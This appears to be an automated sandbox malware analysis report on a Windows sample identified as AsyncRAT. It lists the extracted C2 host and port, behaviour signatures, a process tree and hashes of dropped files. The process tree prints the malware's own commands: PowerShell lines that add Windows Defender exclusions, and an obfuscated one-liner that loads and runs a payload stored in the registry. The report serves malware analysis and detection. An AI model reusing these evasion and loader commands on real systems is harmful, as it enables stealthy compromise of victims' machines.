Analysis
-
max time kernel
150s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
23-07-2024 22:10
Static task
static1
Behavioral task
behavioral1
Sample
60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe
Resource
win10v2004-20240709-en
General
-
Target
60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe
-
Size
9.5MB
-
MD5
ddc8d49e477960bc7601809021f33738
-
SHA1
f3cd85a1934d4818c3c88b0314957b1e2304e264
-
SHA256
60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0
-
SHA512
a6b73d8f3eabc4e855de927257075510c593d52d59efc121bc21d8034c57ba0251e8453c4d995cd156aea7aa69bee8ee4ccfd2091591a6c328eecd85d2bcf955
-
SSDEEP
49152:4hVHBlu5tvVvYlOJ0rUKrwPlt716X/hFiZPixVUg148GwjQJKGPt6:4hjC
Malware Config
Extracted
asyncrat
LocalHostTool's
increased-wage.gl.at.ply.gg:9707
-
delay
1
-
install
true
-
install_file
Deadsvchost.exe
-
install_folder
%Temp%
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2628 created 424 2628 powershell.EXE 5 -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x001400000000549c-14.dat family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2748 powershell.exe 3000 powershell.exe 2628 powershell.EXE -
Executes dropped EXE 2 IoCs
pid Process 2792 Deadsvchost.exe 2536 Lime.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2628 set thread context of 2896 2628 powershell.EXE 39 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Lime.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 507f491c4dddda01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2748 powershell.exe 3000 powershell.exe 2628 powershell.EXE 2628 powershell.EXE 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe 2896 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 2628 powershell.EXE Token: SeDebugPrivilege 2628 powershell.EXE Token: SeDebugPrivilege 2896 dllhost.exe Token: SeAuditPrivilege 840 svchost.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 2144 wrote to memory of 2748 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 30 PID 2144 wrote to memory of 2748 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 30 PID 2144 wrote to memory of 2748 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 30 PID 2144 wrote to memory of 2792 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 32 PID 2144 wrote to memory of 2792 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 32 PID 2144 wrote to memory of 2792 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 32 PID 2144 wrote to memory of 3000 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 33 PID 2144 wrote to memory of 3000 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 33 PID 2144 wrote to memory of 3000 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 33 PID 2144 wrote to memory of 2536 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 35 PID 2144 wrote to memory of 2536 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 35 PID 2144 wrote to memory of 2536 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 35 PID 2144 wrote to memory of 2536 2144 60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe 35 PID 1452 wrote to memory of 2628 1452 taskeng.exe 37 PID 1452 wrote to memory of 2628 1452 taskeng.exe 37 PID 1452 wrote to memory of 2628 1452 taskeng.exe 37 PID 2628 wrote to memory of 2896 2628 powershell.EXE 39 PID 2628 wrote to memory of 2896 2628 powershell.EXE 39 PID 2628 wrote to memory of 2896 2628 powershell.EXE 39 PID 2628 wrote to memory of 2896 2628 powershell.EXE 39 PID 2628 wrote to memory of 2896 2628 powershell.EXE 39 PID 2628 wrote to memory of 2896 2628 powershell.EXE 39 PID 2628 wrote to memory of 2896 2628 powershell.EXE 39 PID 2628 wrote to memory of 2896 2628 powershell.EXE 39 PID 2628 wrote to memory of 2896 2628 powershell.EXE 39 PID 2896 wrote to memory of 424 2896 dllhost.exe 5 PID 2896 wrote to memory of 476 2896 dllhost.exe 6 PID 2896 wrote to memory of 492 2896 dllhost.exe 7 PID 2896 wrote to memory of 500 2896 dllhost.exe 8 PID 2896 wrote to memory of 596 2896 dllhost.exe 9 PID 2896 wrote to memory of 676 2896 dllhost.exe 10 PID 2896 wrote to memory of 760 2896 dllhost.exe 11 PID 2896 wrote to memory of 808 2896 dllhost.exe 12 PID 2896 wrote to memory of 840 2896 dllhost.exe 13 PID 2896 wrote to memory of 964 2896 dllhost.exe 15 PID 2896 wrote to memory of 108 2896 dllhost.exe 16 PID 2896 wrote to memory of 1008 2896 dllhost.exe 17 PID 2896 wrote to memory of 1028 2896 dllhost.exe 18 PID 2896 wrote to memory of 1104 2896 dllhost.exe 19 PID 2896 wrote to memory of 1164 2896 dllhost.exe 20 PID 2896 wrote to memory of 1240 2896 dllhost.exe 21 PID 2896 wrote to memory of 1308 2896 dllhost.exe 23 PID 2896 wrote to memory of 1644 2896 dllhost.exe 24 PID 2896 wrote to memory of 280 2896 dllhost.exe 25 PID 2896 wrote to memory of 2104 2896 dllhost.exe 26 PID 2896 wrote to memory of 2380 2896 dllhost.exe 27 PID 2896 wrote to memory of 2792 2896 dllhost.exe 32 PID 2896 wrote to memory of 1452 2896 dllhost.exe 36
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:424
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e415ed46-c091-48cc-856b-95c742e3af10}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2896
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:596
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1308
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:280
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:760
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:808
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1164
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:840 -
C:\Windows\system32\taskeng.exetaskeng.exe {0236B154-C7D6-40AA-936F-8E972603C572} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](68)+''+[Char](101)+''+[Char](97)+''+'d'+'st'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:964
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:108
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1008
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1028
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1104
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1644
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2104
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2380
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:492
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:500
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1240
-
C:\Users\Admin\AppData\Local\Temp\60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe"C:\Users\Admin\AppData\Local\Temp\60c5753499a5e98229955174e4afbc0ed7c948692edfa864cb75669037f608a0.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Deadsvchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
C:\ProgramData\Deadsvchost.exe"C:\ProgramData\Deadsvchost.exe"3⤵
- Executes dropped EXE
PID:2792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Lime.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\ProgramData\Lime.exe"C:\ProgramData\Lime.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2536
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD51a1ac88b495650cc6238f159d7107167
SHA12c7855283975df2c94d77e3830959d2d3863c966
SHA2569f9cb8c969e3620d80653d86f9dba16dd9d1e579f475a9b87b9e6bcf32301cd4
SHA512337e3dcc14e2abdb2fe2f695287b61a4e4ccec2f741862d972b32a35729c727c750a67c02978b085555b398fc538ab06f25406b2e1642fa82f207c78c874921a
-
Filesize
151KB
MD5b8479a23c22cf6fc456e197939284069
SHA1b2d98cc291f16192a46f363d007e012d45c63300
SHA25618294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d41586c88e756d04bf8ee27e83151822
SHA154dafcdedf03e0e6ec489ca095b53d32aa1daa26
SHA256fc34407b7f57aa1eecb077f949a926f491b65cb2a629a9a8c6b49de6d29fb6dd
SHA512dac80a3edaab93bbb5b10f015d4a93f4cf3c8d69b1182679e8d1bb385929ad521a7e8580c6d189a8318c6ec21968da2203b9a9d998f19efba1925335ef915abb